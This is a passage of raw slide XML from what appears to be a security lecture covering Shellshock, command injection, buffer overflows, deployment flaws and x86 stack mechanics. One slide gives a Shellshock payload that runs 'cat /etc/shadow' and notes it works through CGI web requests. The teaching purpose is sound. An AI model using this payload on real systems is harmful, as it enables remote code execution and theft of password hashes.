            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By passing as a command the string:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>() { :;}; cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/shadow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The command will be put in the environment variable and interpreted, resulting in the injected command executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also, CGI web applications pass arguments through environment variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can execute arbitrary code through a web request!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10113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8" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Lessons Learned</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1007619" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Invoking commands with system() and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>popen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() is dangerous</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Input from the user should always be sanitized </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="119696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76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76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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overflows/Overwrites</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="433155" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The lack of boundary checking is one of the most common mistakes in C/C++ applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overflows are one of the most popular type of attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Architecture/OS version dependant</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be exploited both locally and remotely</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can modify both the data and the control flow of an application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recent tools have made the process of exploiting overflows easier if not completely automatic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Much research has been devoted to finding vulnerabilities, designing prevention techniques, and developing detection mechanisms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some of these mechanisms have found their way to mainstream operating system (non-executable stack, layout randomization)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="199190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3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3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31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31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31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315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315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331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Deployment Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These vulnerabilities are introduced by an incorrect/faulty deployment/configuration of the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An application is installed with more privileges than the ones it should have</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An application is installed on a system that has a faulty security policy and/or mechanism (e.g., a file that should be read-only is actually writeable)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An application is configured with easy-to-guess default credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If correctly deployed, the application would be (more) secure </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="86701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Stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack is essentially scratch memory for functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used in MIPS, ARM, x86, and x86-64 processors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Starts at high memory addresses and grows down</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Functions are free to push registers or values onto the stack, or pop values from the stack into registers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The assembly language supports this on x86</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> holds the address of the top of the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>push %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> decrements the stack pointer (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) then stores the value in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to the location pointed to by the stack pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> stores the value at the location pointed to by the stack pointer into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, then increments the stack pointer (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>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70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="105543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Stack Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst/>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Garbage</a:t>
                      </a:r>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71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1168494" y="276685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0xFFFFFFFF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1953845" y="397397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3927318" y="260504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0x10000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="567369" y="5074404"/>
          <a:ext cx="3696160" cy="11125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0xa</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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0x0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0x10000</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6839834" y="1695032"/>
            <a:ext cx="1817783" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>push %</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p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pop %</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1953845" y="1778558"/>
            <a:ext cx="2309684"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850512" y="3194048"/>
            <a:ext cx="2309684"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850512" y="3597008"/>
            <a:ext cx="2309684"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6245411" y="187125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633045" y="5147061"/>
            <a:ext cx="1320800"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2469999" y="5140434"/>
            <a:ext cx="1320800"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633045" y="5515108"/>
            <a:ext cx="1320800"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2469999" y="5521871"/>
            <a:ext cx="1320800"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647397" y="5883155"/>
            <a:ext cx="1320800"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2469999" y="5883155"/>
            <a:ext cx="1320800"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703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22"/>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Stack Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst/>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Garbage</a:t>
                      </a:r>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72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1168494" y="276685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0xFFFFFFFF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1953845" y="397397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3927318" y="260504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0x10000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="567369" y="5074404"/>
          <a:ext cx="3696160" cy="11125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0xa</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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0x0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0x10000</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6839834" y="1695032"/>
            <a:ext cx="1817783" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>push %</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p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pop %</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6245411" y="215065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83959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Stack Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst/>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pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US">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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="34447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Garbage</a:t>
                      </a:r>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73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1168494" y="276685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0xFFFFFFFF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1953845" y="397397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3927318" y="260504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0x10000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="567369" y="5074404"/>
          <a:ext cx="3696160" cy="11125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0xa</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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0x0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0xFFFC</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6839834" y="1695032"/>
            <a:ext cx="1817783" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>push %</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p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pop %</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6245411" y="215065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a:off x="1168494" y="311398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850512" y="2858824"/>
            <a:ext cx="2309684"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312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Stack Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst/>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pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US">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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="34447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Garbage</a:t>
                      </a:r>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74</a:t>
            </a:fld>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0xFFFFFFFF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1953845" y="397397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3927318" y="260504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0x10000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="567369" y="5074404"/>
          <a:ext cx="3696160" cy="11125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0xa</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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0x0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0xFFFC</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6839834" y="1695032"/>
            <a:ext cx="1817783" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>push %</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p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pop %</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6245411" y="234136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a:off x="1168494" y="311398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12567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Stack Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst/>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pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US">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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="34447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Garbage</a:t>
                      </a:r>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75</a:t>
            </a:fld>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0xFFFFFFFF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1953845" y="397397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3927318" y="260504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0x10000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="567369" y="5074404"/>
          <a:ext cx="3696160" cy="11125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0xa</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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0xa</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
